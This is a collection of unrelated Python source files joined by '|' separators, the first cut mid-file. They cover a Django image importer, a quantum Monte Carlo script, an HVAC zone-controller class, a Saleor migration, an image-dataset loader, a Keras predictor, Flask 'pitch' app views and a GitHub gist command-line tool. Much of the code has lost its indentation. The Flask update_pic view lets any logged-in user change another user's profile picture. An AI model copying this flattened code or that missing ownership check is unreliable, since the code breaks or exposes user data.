            if SkyPicture.objects.filter(device=img.device).filter(date=img.date).filter(time=img.time).count() > 0:
                print('Image already in the database')
                continue
            filename = dt.strftime("%Y-%m-%d-%H-%M-%S-") + img.device.username.username + ".jpg"
            print(filename)
            img.image.save(filename, File(f), True)
            img.save()
            gator.task(computeProjection, img.id)
            print('')
|
import numpy as np
from qflow.wavefunctions import SimpleGaussian
from qflow.hamiltonians import HarmonicOscillator
from qflow.samplers import ImportanceSampler
from qflow.statistics import compute_statistics_for_series, statistics_to_tex
from qflow.mpi import mpiprint
N, D = 100, 3
system = np.empty((N, D))
H = HarmonicOscillator(omega_ho=1)
psi_opt = SimpleGaussian(alpha=0.5)
psi_nopt = SimpleGaussian(alpha=0.51)
sampler_opt = ImportanceSampler(system, psi_opt, 0.1)
sampler_nopt = ImportanceSampler(system, psi_nopt, 0.1)
sampler_opt.thermalize(10000)
sampler_nopt.thermalize(10000)
samples = 2 ** 23
stats = [
compute_statistics_for_series(H.local_energy_array(sampler_opt, psi_opt, 100) / N),
compute_statistics_for_series(
H.local_energy_array(sampler_nopt, psi_nopt, samples) / N, method="blocking"
),
]
labels = [r"$\alpha_G = 0.5$", r"$\alpha_G=0.51$"]
mpiprint(statistics_to_tex(stats, labels, filename=__file__ + ".table1.tex"))
stats = [
compute_statistics_for_series(H.mean_radius_array(sampler_opt, samples)),
compute_statistics_for_series(H.mean_squared_radius_array(sampler_opt, samples)),
]
labels = [r"$<r>$", r"$<r^2>$"]
mpiprint(statistics_to_tex(stats, labels, filename=__file__ + ".table2.tex"))
|
# -*- coding: utf-8 -*-
# Copyright 2020 Kevin Schlosser
import datetime
import threading
from ..utils import (
get_bit as _get_bit,
set_bit as _set_bit
)
from ..packet import (
GetConfigurationRequest,
GetStatusRequest
)
from ..commands import (
FanKeySelection,
HeatDemand,
AuxHeatDemand,
BackUpHeatDemand,
FanDemand,
ChangeFilterTimeRemaining,
ChangeUvLightMaintenanceTimer,
ChangeHumidifierPadMaintTimerall,
CoolDemand,
SystemSwitchModify,
DehumidificationDemand,
HumidificationDemand,
FAN_DEMAND_MANUAL as _FAN_DEMAND_MANUAL,
FAN_DEMAND_COOL as _FAN_DEMAND_COOL,
FAN_DEMAND_HEAT as _FAN_DEMAND_HEAT,
FAN_DEMAND_AUX_HEAT as _FAN_DEMAND_AUX_HEAT,
FAN_DEMAND_EMERGENCY_HEAT as _FAN_DEMAND_EMERGENCY_HEAT,
FAN_DEMAND_DEFROST as _FAN_DEMAND_DEFROST
)
ZONE_CONTROLLER_CAPABLE = 0x01
ZONE_CONTROLLER_NOT_CAPABLE = 0x00
ZONE_CONTROLLER_SYSTEM_TYPE_UNKNOWN = 0x00
ZONE_CONTROLLER_SYSTEM_TYPE_CONVENTIONAL = 0x01
ZONE_CONTROLLER_SYSTEM_TYPE_HEAT_PUMP = 0x02
ZONE_CONTROLLER_SYSTEM_TYPE_DUAL_FUEL = 0x03
ZONE_CONTROLLER_SYSTEM_TYPE_COOLING = 0x04
ZONE_CONTROLLER_SYSTEM_TYPE_GAS_HEAT = 0x05
ZONE_CONTROLLER_SYSTEM_TYPE_ELECTRIC_HEAT = 0x06
ZONE_CONTROLLER_SYSTEM_TYPE_ELECTRIC_ONLY = 0x07
ZONE_CONTROLLER_SYSTEM_TYPE_FAN_ONLY = 0x08
ZONE_CONTROLLER_SYSTEM_TYPE_GEOTHERMAL_HEAT_PUMP = 0x09
ZONE_CONTROLLER_SYSTEM_TYPE_GEOTHERMAL_DUAL_FUEL = 0x0A
ZONE_CONTROLLER_SYSTEM_TYPE_BOILER = 0x0B
ZONE_CONTROLLER_SYSTEM_TYPE_BOILER_HEAT_PUMP = 0x0C
ZONE_CONTROLLER_SYSTEM_TYPE_DEFAULT = 0x7F
ZONE_CONTROLLER_SYSTEM_TYPE_OTHER = 0xFF
ZONE_CONTROLLER_FAN_STATUS_AUTO = 0x00
ZONE_CONTROLLER_FAN_STATUS_ALWAYS_ON = 0x01
ZONE_CONTROLLER_FAN_STATUS_OCCUPIED_ON = 0x02
ZONE_CONTROLLER_SYSTEM_STATUS_OFF = 0x00
ZONE_CONTROLLER_SYSTEM_STATUS_COOL = 0x01
ZONE_CONTROLLER_SYSTEM_STATUS_AUTO_COOL = 0x02
ZONE_CONTROLLER_SYSTEM_STATUS_HEAT = 0x03
ZONE_CONTROLLER_SYSTEM_STATUS_AUTO_HEAT = 0x04
ZONE_CONTROLLER_SYSTEM_STATUS_BACKUP = 0x05
class ZoneControllerMDI(object):
def __init__(self, network, address, subnet, mac_address, session_id):
self.network = network
self.address = address
self.subnet = subnet
self.mac_address = mac_address
self.session_id = session_id
def _send(self, packet):
"""
        :type packet: climatetalk.packet.Packet
:return:
"""
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
self.network.send(packet)
def _get_status_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetStatusRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
            GetStatusRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
        GetStatusRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
def _get_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetConfigurationRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
GetConfigurationRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
GetConfigurationRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
@property
def system_type(self):
"""
:return: one of ZONE_CONTROLLER_SYSTEM_TYPE_* constants
"""
data = self._get_mdi(0, 0)
return data[0]
@property
def heat_stages(self):
"""
:return: 0x0F = variable
"""
data = self._get_mdi(1, 0)
        return data[0] >> 4 & 0xF
@property
def cool_stages(self):
"""
:return: 0x0F = variable
"""
data = self._get_mdi(1, 0)
return data[0] & 0xF
@property
def balance_point_set_temp(self):
"""
:return: 0x00 = Off, 0xFF = default
"""
data = self._get_mdi(2, 0)
return data[0]
@property
def filter_time(self):
"""
:return: hours
"""
data = self._get_mdi(3, 1)
return data[0] << 8 | data[1]
@filter_time.setter
def filter_time(self, value):
packet = ChangeFilterTimeRemaining()
if value is True:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
else:
return
self._send(packet)
@property
def uv_lamp_time(self):
"""
:return: days
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(5, 1)
return data[0] << 8 | data[1]
@uv_lamp_time.setter
def uv_lamp_time(self, value):
packet = ChangeUvLightMaintenanceTimer()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def humidifier_pad_time(self):
"""
:return: hours
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(7, 1)
return data[0] << 8 | data[1]
@humidifier_pad_time.setter
def humidifier_pad_time(self, value):
packet = ChangeHumidifierPadMaintTimerall()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def cool_humidification_capable(self):
"""
:return: ZONE_CONTROLLER_CAPABLE or ZONE_CONTROLLER_NOT_CAPABLE
"""
data = self._get_mdi(9, 0)
return int(_get_bit(data[0], 2))
@property
def humidification_capable(self):
"""
:return: ZONE_CONTROLLER_CAPABLE or ZONE_CONTROLLER_NOT_CAPABLE
"""
data = self._get_mdi(9, 0)
return int(_get_bit(data[0], 1))
@property
def dehumidification_capable(self):
"""
:return: ZONE_CONTROLLER_CAPABLE or ZONE_CONTROLLER_NOT_CAPABLE
"""
data = self._get_mdi(9, 0)
return int(_get_bit(data[0], 0))
@property
def critical_fault(self):
data = self._get_status_mdi(0, 0)
return data[0]
@property
def minor_fault(self):
data = self._get_status_mdi(1, 0)
return data[0]
@property
def heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(7, 0)
return data[0] * 0.5
@heat_demand.setter
def heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def cool_demand(self):
"""
:return:
"""
data = self._get_status_mdi(9, 0)
return data[0] * 0.5
@cool_demand.setter
def cool_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = CoolDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def fan_mode_setting(self):
"""
:return: one of ZONE_CONTROLLER_FAN_STATUS_* constants
"""
data = self._get_status_mdi(10, 0)
return data[0]
@fan_mode_setting.setter
def fan_mode_setting(self, value):
packet = FanKeySelection()
packet.set_command_data(value)
self._send(packet)
@property
def fan_demand(self):
"""
:return:
"""
data = self._get_status_mdi(11, 0)
return data[0] * 0.5
def fan_demand_manual(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_MANUAL, value)
self._send(packet)
fan_demand_manual = property(fset=fan_demand_manual)
def fan_demand_cool(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_COOL, value)
self._send(packet)
fan_demand_cool = property(fset=fan_demand_cool)
def fan_demand_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_HEAT, value)
self._send(packet)
fan_demand_heat = property(fset=fan_demand_heat)
def fan_demand_aux_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_AUX_HEAT, value)
self._send(packet)
fan_demand_aux_heat = property(fset=fan_demand_aux_heat)
def fan_demand_emergency_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_EMERGENCY_HEAT, value)
self._send(packet)
fan_demand_emergency_heat = property(fset=fan_demand_emergency_heat)
def fan_demand_defrost(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_DEFROST, value)
self._send(packet)
fan_demand_defrost = property(fset=fan_demand_defrost)
@property
def fan_rate(self):
"""
:return:
"""
data = self._get_mdi(12, 0)
return data[0]
@property
def fan_delay(self):
"""
:return:
"""
data = self._get_mdi(13, 0)
return data[0]
@property
def emergency_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(14, 0)
return data[0] * 0.5
@emergency_heat_demand.setter
def emergency_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = BackUpHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def aux_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(15, 0)
return data[0] * 0.5
@aux_heat_demand.setter
def aux_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = AuxHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def humidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(16, 0)
return data[0] * 0.5
@humidification_demand.setter
def humidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def dehumidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(17, 0)
return data[0] * 0.5
@dehumidification_demand.setter
def dehumidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = DehumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def operating_status(self):
"""
:return: one of ZONE_CONTROLLER_SYSTEM_STATUS_
"""
data = self._get_status_mdi(18, 0)
return data[0]
@operating_status.setter
def operating_status(self, value):
packet = SystemSwitchModify()
packet.set_command_data(value)
self._send(packet)
@property
def has_freeze_fault(self):
data = self._get_mdi(19, 0)
return int(_get_bit(data[0], 7))
@property
def has_overheat_fault(self):
data = self._get_mdi(19, 0)
return int(_get_bit(data[0], 6))
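# Illustrative sketch (hypothetical class, not part of the original module):
# the fan_demand_* attributes above use property(fset=...) to create write-only
# properties, so assignment is routed through the setter while reading raises
# AttributeError. The same pattern in isolation:
class _WriteOnlyDemo(object):
    def _set_level(self, value):
        self._level = value
    level = property(fset=_set_level)
# usage:
#   demo = _WriteOnlyDemo()
#   demo.level = 42   # stored via _set_level
#   demo.level        # raises AttributeError (no getter defined)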
|
# Generated by Django 2.0.3 on 2018-08-07 10:47
import json
from django.contrib.postgres import fields
from django.db import migrations
from saleor.page.models import Page
from saleor.product.models import Category, Collection
def get_linked_object_kwargs(object):
return {"pk": object.pk, "slug": object.slug}
def get_linked_object_url(menu_item):
if menu_item.category:
return Category(
**get_linked_object_kwargs(menu_item.category)
).get_absolute_url()
elif menu_item.collection:
return Collection(
**get_linked_object_kwargs(menu_item.collection)
).get_absolute_url()
elif menu_item.page:
return Page(**get_linked_object_kwargs(menu_item.page)).get_absolute_url()
return None
def get_menu_item_as_dict(menu_item):
data = {}
object_url = get_linked_object_url(menu_item) or menu_item.url
data["url"] = object_url
data["name"] = menu_item.name
data["translations"] = {
translated.language_code: {"name": translated.name}
for translated in menu_item.translations.all()
}
return data
def get_menu_as_json(menu):
"""Build Tree-like JSON structure from the top menu.
From the top menu items, its children and its grandchildren.
"""
top_items = menu.items.filter(parent=None)
menu_data = []
for item in top_items:
top_item_data = get_menu_item_as_dict(item)
top_item_data["child_items"] = []
children = item.children.all()
for child in children:
child_data = get_menu_item_as_dict(child)
grand_children = child.children.all()
grand_children_data = [
get_menu_item_as_dict(grand_child) for grand_child in grand_children
]
child_data["child_items"] = grand_children_data
top_item_data["child_items"].append(child_data)
menu_data.append(top_item_data)
return json.dumps(menu_data)
def update_menus(apps, schema_editor):
Menu = apps.get_model("menu", "Menu")
menus = Menu.objects.all()
for menu in menus:
menu.json_content = get_menu_as_json(menu)
menu.save(update_fields=["json_content"])
class Migration(migrations.Migration):
dependencies = [("menu", "0006_auto_20180803_0528")]
operations = [
migrations.AlterField(
model_name="menu",
name="json_content",
field=fields.JSONField(blank=True, default=dict),
),
migrations.RunPython(update_menus, migrations.RunPython.noop),
]
|
import os
from os import listdir
from os.path import isdir, isfile, join
import cv2
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
import numpy as np
class bilddatensatz:
    #
    # Walks through all subdirectories of the given
    # root directory and
    # generates a list of the form:
    #
    # [ ["data/bikes/jfksdj43.jpg", "bikes"],
    #   ["data/cars/bvcnm401.jpg", "cars"],
    #   ...
    # ]
    #
def __init__(self, root_folder, img_size, inputs_fuer_VGG16=False):
self.img_size = img_size
self.inputs_fuer_VGG16 = inputs_fuer_VGG16
self.all_training_items = []
self.class_names = \
[d for d in listdir(root_folder)
if isdir(os.path.join(root_folder,d))]
print("Unter dem Verzeichnis\n\t", root_folder,
"\nhabe ich folgende Unterordner/Klassen gefunden:")
print(self.class_names)
self.nr_classes = len(self.class_names)
# For each subfolder ...
for class_id, class_name in enumerate(self.class_names):
subfolder_name = root_folder + "/" + class_name + "/"
filenames = \
[subfolder_name + f
for f in listdir(subfolder_name)
if isfile(join(subfolder_name, f))]
print("{} Dateien im Unterverzeicnis {}".format(len(filenames),
subfolder_name) )
# For each image filename in current subfolder ...
for filename in filenames:
teacher_vec = np.zeros( self.nr_classes )
teacher_vec[class_id] = 1.0
self.all_training_items.append(
[filename,
class_id,
class_name,
teacher_vec] )
self.nr_images = len(self.all_training_items)
print("Insgesamt sind {} Bilder verfügbar".format(self.nr_images))
if False:
print("Hier die ersten 3 Einträge:")
print(self.all_training_items[:3])
def lade_bild(self, absolute_filename):
"""
        Load an image from the given file
        and make it mean-free (per colour channel)
"""
img = cv2.imread(absolute_filename)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img,
self.img_size,
interpolation=cv2.INTER_AREA)
if self.inputs_fuer_VGG16:
x = img.astype(float)
x = np.expand_dims(x, axis=0)
#print("x has shape", x.shape)
#print("x has mean", np.mean(x))
# From the VGG paper:
# "The only pre-processing we do is subtracting the mean RGB value,
# computed on the training set, from each pixel."
#
# see imagenet_utils.py
#
x = preprocess_input(x)
#print("x has mean", np.mean(x))
img_preprocessed = x.reshape((224,224,3))
else:
img_preprocessed = img * (1.0 / 255.0)
return img, img_preprocessed
def hole_bild_per_index(self, idx):
"""
        Return the image from the dataset
        with index idx.
"""
image_filename = self.all_training_items[idx][0]
class_id = self.all_training_items[idx][1]
class_name = self.all_training_items[idx][2]
teacher_vec = self.all_training_items[idx][3]
img, img_preprocessed = self.lade_bild(image_filename)
return img, img_preprocessed, \
class_id, class_name, teacher_vec
def hole_irgendein_bild(self):
"""
        Return a random image
"""
rnd_idx = np.random.randint(0, self.nr_images)
return self.hole_bild_per_index( rnd_idx )
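# Illustrative usage sketch (not part of the original file): the root folder
# "data" and the per-class layout (e.g. data/bikes/*.jpg, data/cars/*.jpg) are
# assumptions for demonstration only.
if __name__ == "__main__":
    datensatz = bilddatensatz("data", img_size=(224, 224), inputs_fuer_VGG16=True)
    img, img_pre, class_id, class_name, teacher_vec = datensatz.hole_irgendein_bild()
    print("Random sample of class:", class_name)
    print("Teacher vector:", teacher_vec)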
|
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
import numpy as np
import os
import snnn
model = load_model('./model.h5')
predictDir = './predict'
files = os.listdir(predictDir)
classDict = {v: k for k, v in snnn.getClassesDict().items()}
info = '\n\nGraduation Project ShuangJiang Du.\n'
info += 'Thanks MSRMZNM ANEKI ,ICG ANEKI for help.\n'
print(info)
charSeq = ''
for file in files:
img = image.load_img(os.path.join(predictDir ,file) ,target_size=snnn.stdSize ,color_mode='grayscale')
imgArr3 = image.img_to_array(img)
imgArr4 = np.expand_dims(imgArr3 ,axis=0)
imgArr4 = imgArr4.astype(float) / float(255)
re = model.predict_classes(imgArr4)
charSeq += classDict[re[0]]
print(classDict[re[0]] + ' -> ' + file)
print('\n' + charSeq + '\n')
|
from flask import render_template, request, redirect, url_for, abort
from ..models import User,Pitch,Comment,Upvote,Downvote
from . import main
from flask_login import login_required,current_user
from .forms import UpdateProfile,PitchForm,CommentForm
from .. import db,photos
# Views
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
pitch = Pitch.query.all()
education = Pitch.query.filter_by(category = 'education').all()
music = Pitch.query.filter_by(category = 'music').all()
religion = Pitch.query.filter_by(category = 'religion').all()
title = "Welcome to the page"
return render_template('index.html',title = title ,pitch = pitch, education = education, music = music, religion = religion)
@main.route('/new_pitch', methods = ['POST','GET'])
@login_required
def new_pitch():
form = PitchForm()
if form.validate_on_submit():
title=form.title.data
pitch=form.post.data
category=form.category.data
user_id=current_user
new_pitch_object=Pitch(pitch=pitch,user_id=current_user._get_current_object().id,category=category,title=title)
new_pitch_object.save_pitch()
return redirect(url_for('main.index'))
return render_template('pitch.html',form=form)
@main.route('/comment/<int:pitch_id>', methods = ['POST','GET'])
@login_required
def comment(pitch_id):
form = CommentForm()
pitch = Pitch.query.get(pitch_id)
all_comments = Comment.query.filter_by(pitch_id = pitch_id).all()
if form.validate_on_submit():
comment = form.comment.data
pitch_id = pitch_id
user_id = current_user._get_current_object().id
new_comment = Comment(comment = comment,user_id = user_id, pitch_id = pitch_id)
new_comment.save_comment()
return redirect(url_for('.comment', pitch_id = pitch_id))
return render_template('comment.html', form = form, pitch= pitch, all_comments = all_comments)
@main.route('/user/<uname>')
def profile(uname):
    user = User.query.filter_by(username = uname).first()
    if user is None:
        abort(404)
    pitch = Pitch.query.filter_by(user_id = user.id).all()
    return render_template("profile/profile.html", user = user, pitch = pitch)
@main.route('/user/<uname>/update_profile',methods = ['GET','POST'])
@login_required
def update_profile(uname):
form = UpdateProfile()
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
if form.validate_on_submit():
user.bio = form.bio.data
db.session.add(user)
db.session.commit()
return redirect(url_for('.profile',uname=user.username))
return render_template('profile/update.html',form =form)
@main.route('/user/<uname>/update/profile',methods= ['POST'])
@login_required
def update_pic(uname):
user = User.query.filter_by(username = uname).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',uname=uname))
@main.route('/upvote/<int:id>',methods = ['POST','GET'])
@login_required
def like(id):
pitches = Upvote.get_upvotes(id)
valid_string = f'{current_user.id}:{id}'
for pitch in pitches:
to_str = f'{pitch}'
print(valid_string+" "+to_str)
if valid_string == to_str:
return redirect(url_for('main.index',id=id))
else:
continue
new_upvote = Upvote(user = current_user, pitch_id=id)
new_upvote.save_upvote()
return redirect(url_for('main.index',id=id))
@main.route('/downvote/<int:id>',methods = ['POST','GET'])
@login_required
def dislike(id):
pitches = Downvote.get_downvotes(id)
valid_string = f'{current_user.id}:{id}'
for pitch in pitches:
        to_str = f'{pitch}'
print(valid_string+" "+to_str)
if valid_string == to_str:
return redirect(url_for('main.index',id=id))
else:
continue
new_downvote = Downvote(user = current_user, pitch_id=id)
new_downvote.save_downvote()
return redirect(url_for('main.index',id=id))
|
# -*- coding: utf-8 -*-
"""
Name:
gist
Usage:
gist list
gist edit <id>
gist description <id> <desc>
gist info <id>
gist fork <id>
gist files <id>
gist delete <ids> ...
gist archive <id>
gist content <id> [<filename>] [--decrypt]
gist create <desc> [--public] [--encrypt] [FILES ...]
gist clone <id> [<name>]
gist version
Description:
This program provides a command line interface for interacting with github
gists.
Commands:
create
Create a new gist. A gist can be created in several ways. The content
        of the gist can be piped in,
$ echo "this is the content" | gist create "gist description"
The gist can be created from an existing set of files,
$ gist create "gist description" foo.txt bar.txt
The gist can be created on the fly,
$ gist create "gist description"
        which will open the user's default editor.
edit
You can edit your gists directly with the 'edit' command. This command
will clone the gist to a temporary directory and open up the default
editor (defined by the EDITOR environment variable) to edit the files
in the gist. When the editor is exited the user is prompted to commit
the changes, which are then pushed back to the remote.
fork
Creates a fork of the specified gist.
description
Updates the description of a gist.
list
Returns a list of your gists. The gists are returned as,
2b1823252e8433ef8682 - mathematical divagations
a485ee9ddf6828d697be - notes on defenestration
589071c7a02b1823252e + abecedarian pericombobulations
        The first column is the gist's unique identifier; the second column
        indicates whether the gist is public ('+') or private ('-'); the third
        column is the description of the gist, which may be empty.
clone
Clones a gist to the current directory. This command will clone any
        gist based on its unique identifier (i.e. not just the user's) to the
current directory.
delete
Deletes the specified gist.
files
Returns a list of the files in the specified gist.
archive
Downloads the specified gist to a temporary directory and adds it to a
tarball, which is then moved to the current directory.
content
Writes the content of each file in the specified gist to the terminal,
e.g.
$ gist content c971fca7997aed65ddc9
foo.txt:
this is foo
bar.txt:
this is bar
For each file in the gist the first line is the name of the file
followed by a colon, and then the content of that file is written to
the terminal.
If a filename is given, only the content of the specified filename
will be printed.
$ gist content de42344a4ecb6250d6cea00d9da6d83a file1
content of file 1
info
This command provides a complete dump of the information about the gist
as a JSON object. It is mostly useful for debugging.
version
Returns the current version of gist.
"""
import codecs
import fcntl
import locale
import logging
import os
import struct
import sys
import tempfile
import termios
import docopt
import gnupg
import simplejson as json
import gist
try:
import configparser
except ImportError:
import ConfigParser as configparser
logger = logging.getLogger('gist')
# We need to wrap stdout in order to properly handle piping unicode output
stream = sys.stdout.detach() if sys.version_info[0] > 2 else sys.stdout
encoding = locale.getpreferredencoding()
sys.stdout = codecs.getwriter(encoding)(stream)
class GistError(Exception):
def __init__(self, msg):
super(GistError, self).__init__(msg)
self.msg = msg
def terminal_width():
"""Returns the terminal width
Tries to determine the width of the terminal. If there is no terminal, then
None is returned instead.
"""
try:
exitcode = fcntl.ioctl(
0,
termios.TIOCGWINSZ,
struct.pack('HHHH', 0, 0, 0, 0))
h, w, hp, wp = struct.unpack('HHHH', exitcode)
return w
except Exception:
pass
def elide(txt, width=terminal_width()):
"""Elide the provided string
The string is elided to the specified width, which defaults to the width of
the terminal.
Arguments:
txt: the string to potentially elide
width: the maximum permitted length of the string
Returns:
A string that is no longer than the specified width.
"""
try:
if len(txt) > width:
return txt[:width - 3] + '...'
except Exception:
pass
return txt
def alternative_editor(default):
"""Return the path to the 'alternatives' editor
Argument:
default: the default to use if the alternatives editor cannot be found.
"""
if os.path.exists('/usr/bin/editor'):
return '/usr/bin/editor'
return default
def environment_editor(default):
"""Return the user specified environment default
Argument:
default: the default to use if the environment variable contains
nothing useful.
"""
editor = os.environ.get('EDITOR', '').strip()
if editor != '':
return editor
return default
def configuration_editor(config, default):
"""Return the editor in the config file
Argument:
default: the default to use if there is no editor in the config
"""
try:
return config.get('gist', 'editor')
except configparser.NoOptionError:
return default
def alternative_config(default):
"""Return the path to the config file in .config directory
Argument:
default: the default to use if ~/.config/gist does not exist.
"""
config_path = os.path.expanduser('~/.config/gist')
if os.path.isfile(config_path):
return config_path
else:
return default
def xdg_data_config(default):
"""Return the path to the config file in XDG user config directory
Argument:
default: the default to use if either the XDG_DATA_HOME environment is
not set, or the XDG_DATA_HOME directory does not contain a 'gist'
file.
"""
config = os.environ.get('XDG_DATA_HOME', '').strip()
if config != '':
config_path = os.path.join(config, 'gist')
if os.path.isfile(config_path):
return config_path
return default
def main(argv=sys.argv[1:], config=None):
args = docopt.docopt(
__doc__,
argv=argv,
version='gist-v{}'.format(gist.__version__),
)
# Read in the configuration file
if config is None:
config = configparser.ConfigParser()
config_path = os.path.expanduser('~/.gist')
config_path = alternative_config(config_path)
config_path = xdg_data_config(config_path)
with open(config_path) as fp:
config.readfp(fp)
# Setup logging
fmt = "%(created).3f %(levelname)s[%(name)s] %(message)s"
logging.basicConfig(format=fmt)
try:
log_level = config.get('gist', 'log-level').upper()
logging.getLogger('gist').setLevel(log_level)
except Exception:
logging.getLogger('gist').setLevel(logging.ERROR)
# Determine the editor to use
editor = None
editor = alternative_editor(editor)
editor = environment_editor(editor)
editor = configuration_editor(config, editor)
if editor is None:
raise ValueError('Unable to find an editor.')
token = config.get('gist', 'token')
gapi = gist.GistAPI(token=token, editor=editor)
if args['list']:
logger.debug(u'action: list')
gists = gapi.list()
for info in gists:
public = '+' if info.public else '-'
desc = '' if info.desc is None else info.desc
line = u'{} {} {}'.format(info.id, public, desc)
try:
print(elide(line))
except UnicodeEncodeError:
logger.error('unable to write gist {}'.format(info.id))
return
if args['info']:
gist_id = args['<id>']
logger.debug(u'action: info')
logger.debug(u'action: - {}'.format(gist_id))
info = gapi.info(gist_id)
print(json.dumps(info, indent=2))
return
if args['edit']:
gist_id = args['<id>']
logger.debug(u'action: edit')
logger.debug(u'action: - {}'.format(gist_id))
gapi.edit(gist_id)
return
if args['description']:
gist_id = args['<id>']
description = args['<desc>']
logger.debug(u'action: description')
logger.debug(u'action: - {}'.format(gist_id))
logger.debug(u'action: - {}'.format(description))
gapi.description(gist_id, description)
return
if args['fork']:
gist_id = args['<id>']
logger.debug(u'action: fork')
logger.debug(u'action: - {}'.format(gist_id))
info = gapi.fork(gist_id)
return
if args['clone']:
gist_id = args['<id>']
gist_name = args['<name>']
logger.debug(u'action: clone')
logger.debug(u'action: - {} as {}'.format(gist_id, gist_name))
gapi.clone(gist_id, gist_name)
return
if args['content']:
gist_id = args['<id>']
logger.debug(u'action: content')
logger.debug(u'action: - {}'.format(gist_id))
content = gapi.content(gist_id)
gist_file = content.get(args['<filename>'])
if args['--decrypt']:
if not config.has_option('gist', 'gnupg-homedir'):
raise GistError('gnupg-homedir missing from config file')
homedir = config.get('gist', 'gnupg-homedir')
logger.debug(u'action: - {}'.format(homedir))
gpg = gnupg.GPG(gnupghome=homedir, use_agent=True)
if gist_file is not None:
print(gpg.decrypt(gist_file).data.decode('utf-8'))
else:
for name, lines in content.items():
lines = gpg.decrypt(lines).data.decode('utf-8')
print(u'{} (decrypted):\n{}\n'.format(name, lines))
else:
if gist_file is not None:
print(gist_file)
else:
for name, lines in content.items():
print(u'{}:\n{}\n'.format(name, lines))
return
if args['files']:
gist_id = args['<id>']
logger.debug(u'action: files')
logger.debug(u'action: - {}'.format(gist_id))
for f in gapi.files(gist_id):
print(f)
return
if args['archive']:
gist_id = args['<id>']
logger.debug(u'action: archive')
logger.debug(u'action: - {}'.format(gist_id))
gapi.archive(gist_id)
return
if args['delete']:
gist_ids = args['<ids>']
logger.debug(u'action: delete')
for gist_id in gist_ids:
logger.debug(u'action: - {}'.format(gist_id))
gapi.delete(gist_id)
return
if args['version']:
logger.debug(u'action: version')
print('v{}'.format(gist.__version__))
return
if args['create']:
logger.debug('action: create')
# If encryption is selected, perform an initial check to make sure that
# it is possible before processing any data.
if args['--encrypt']:
if not config.has_option('gist', 'gnupg-homedir'):
raise GistError('gnupg-homedir missing from config file')
if not config.has_option('gist', 'gnupg-fingerprint'):
raise GistError('gnupg-fingerprint missing from config file')
# Retrieve the data to add to the gist
if sys.stdin.isatty():
if args['FILES']:
logger.debug('action: - reading from files')
files = {}
for path in args['FILES']:
name = os.path.basename(path)
with open(path, 'rb') as fp:
files[name] = fp.read().decode('utf-8')
else:
logger.debug('action: - reading from editor')
with tempfile.NamedTemporaryFile('wb+') as fp:
os.system('{} {}'.format(editor, fp.name))
fp.flush()
fp.seek(0)
files = {'file1.txt': fp.read().decode('utf-8')}
else:
logger.debug('action: - reading from stdin')
files = {'file1.txt': sys.stdin.read()}
description = args['<desc>']
public = args['--public']
# Encrypt the files or leave them unmodified
if args['--encrypt']:
logger.debug('action: - encrypting content')
fingerprint = config.get('gist', 'gnupg-fingerprint')
gnupghome = config.get('gist', 'gnupg-homedir')
gpg = gnupg.GPG(gnupghome=gnupghome, use_agent=True)
data = {}
for k, v in files.items():
cypher = gpg.encrypt(v.encode('utf-8'), fingerprint)
content = cypher.data.decode('utf-8')
data['{}.asc'.format(k)] = {'content': content}
else:
data = {k: {'content': v} for k, v in files.items()}
